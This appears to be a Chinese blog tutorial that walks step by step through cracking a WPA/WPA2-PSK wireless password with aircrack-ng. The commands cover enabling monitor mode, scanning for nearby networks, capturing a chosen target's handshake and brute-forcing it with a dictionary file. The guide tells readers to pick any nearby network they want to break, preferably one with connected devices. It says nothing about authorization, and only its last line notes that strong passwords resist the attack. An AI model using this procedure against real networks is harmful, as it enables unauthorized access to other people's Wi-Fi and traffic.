aircrack-ng破解安全性为WPA/WPA2 PSK的无线网络

1.ifconfig -a

   使用该命令查看本机的无线网卡
aircrack-ng破解安全性为WPA/WPA2 PSK的无线网络_第1张图片

2.ifconfig
       使用该命令查看本机已启动的无线网卡
aircrack-ng破解安全性为WPA/WPA2 PSK的无线网络_第2张图片
       可以发现wlan1,这一网卡并没有显示在上面.如果想使用它进行下面的破解密码操作,首先使用ifconfig wlan1 up启动它.
3.airmon-ng check kill

      使用该命令kill一些会影响接下来的操作的进程
aircrack-ng破解安全性为WPA/WPA2 PSK的无线网络_第3张图片
4.airmon-ng start wlan0

      使用该命令使wlan0网卡开启monitor mode
aircrack-ng破解安全性为WPA/WPA2 PSK的无线网络_第4张图片
5.airodump-ng wlan0mon

      使用该命令查看附近的无线网络
aircrack-ng破解安全性为WPA/WPA2 PSK的无线网络_第5张图片
      选择一个你想破解密码的无线网络,记下它的BSSID、CH(channel),下面的命令会用到.  BSSID  STATION  PWR  RATE......下面显示的是有终端连接的无线网络.

      注意最好选择有终端连接的无线网络,即选择在上边的图片中BSSID  STATION  PWR  RATE......下面出现的BSSID,因为这些BSSID有终端连接,如手机、平板等,

      选择这些更容易抓到handshake包(即用于连接无线网络时发送的认证包),当然也可以选择没在BSSID  STATION  PWR  RATE......下面出现的BSSID,现在没有  终端连接,可能         在我们抓包的过程中会有终端连接进来.
6.airodump-ng  --bssid F0:B4:29:29:8A:03 -c 3 -w crack wlan0mon
      使用该命令抓取某个无线网络的数据包,命令参数解释:bssid、c为filter option;w后面的crack是存放抓取后的数据包的文件名,自定义即可.


7.等待,直到抓到handshake包
aircrack-ng破解安全性为WPA/WPA2 PSK的无线网络_第6张图片
8.aircrack-ng -w /tmp/WPADict.txt crack-01.cap

     使用该命令通过密码字典文件暴力破解该无线网络的密码.


9.破解出密码

     如果足够幸运即密码字典文件中有这一无线网络的密码,那么一段时间后(5、6个小时甚至更长都有可能)就可以找到这一密码.
aircrack-ng破解安全性为WPA/WPA2 PSK的无线网络_第7张图片
  如果密码字典文件中没有这一密码,则破解不出该无线网络的密码.

可以看出设计一个复杂的密码,可以降低被破解的几率.
10.airmon-ng stop wlan0mon

使用该命令关闭wlan0无线网卡monitor mode

你可能感兴趣的:(aircrack-ng破解安全性为WPA/WPA2 PSK的无线网络)